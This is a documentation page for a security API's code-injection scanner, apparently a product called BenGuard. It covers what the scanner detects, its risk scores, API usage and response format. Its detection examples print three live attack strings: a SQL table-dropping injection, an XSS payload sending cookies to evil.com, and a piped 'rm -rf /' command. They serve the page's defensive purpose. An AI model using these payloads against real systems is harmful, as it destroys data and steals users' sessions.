BenGuardBENGUARD/Docs/Scanners/Code Injection
Back to Documentation

Code Injection

Identifies SQL injection, XSS, and command injection

API Field: code_injection_enabled

Overview

Code Injection Detection identifies malicious code patterns that could exploit vulnerabilities in your application. This includes SQL injection, Cross-Site Scripting (XSS), command injection, and other code-based attacks that might be passed through AI interactions.

What It Detects

  • SQL injection attempts
  • Cross-Site Scripting (XSS) payloads
  • Command injection (shell commands)
  • LDAP injection
  • XML/XXE injection
  • Path traversal attacks
  • Template injection
  • Code execution attempts

Why It Matters

Code injection attacks can lead to complete system compromise, data theft, service disruption, and ransomware deployment. These attacks exploit the trust boundary between AI-generated content and backend systems.

Technical Details

Risk Score Range

0.0 - 1.0 (High risk: > 0.6)

Confidence Level

Typically 0.88 - 0.98

Processing Time

< 60ms per scan

Common Use Cases

AI-powered search interfacesNatural language to SQL convertersCode generation toolsAutomated testing assistantsDatabase query builders

Detection Examples

Threat Example #1Risk: 97%
'; DROP TABLE users; --

Classic SQL injection attempting to delete database table.

Threat Example #2Risk: 95%
<script>document.location='http://evil.com/steal?'+document.cookie</script>

XSS payload attempting to steal session cookies.

Threat Example #3Risk: 99%
| rm -rf / --no-preserve-root

Command injection attempting to delete all files on the system.

API Usage

Enable this scanner in your API request by setting code_injection_enabled to true in your API key settings, or include it in your request:

curl -X POST https://benguard.io/api/v1/scan \
  -H "X-API-Key: ben_your_api_key_here" \
  -H "Content-Type: application/json" \
  -d '{
    "prompt": "Your user input here"
  }'

The scanner settings are configured per API key in your dashboard under Settings → Scanner Configuration.

Response Format

When this scanner detects a threat, the response will include:

{
  "is_valid": false,
  "status": "threat_detected",
  "risk_score": 0.97,
  "threat_types": ["code_injection"],
  "details": {
    "results": [
      {
        "scanner": "code_injection",
        "threat_detected": true,
        "risk_score": 0.97,
        "confidence": 0.92,
        "details": {
          "reason": "Classic SQL injection attempting to delete database table.",
          "evidence": ["detected pattern in input"]
        }
      }
    ]
  },
  "request_id": "req_abc123"
}

Best Practices

  • Never execute AI-generated code without sandboxing
  • Use parameterized queries, not string concatenation
  • Implement content security policies
  • Validate all outputs before rendering
  • Use allowlists for permitted operations

Related Scanners

Consider enabling these related scanners for comprehensive protection:

Prompt Injection

Detects attempts to override system instructions

Data Exfiltration

Detects attempts to extract system prompts and hidden data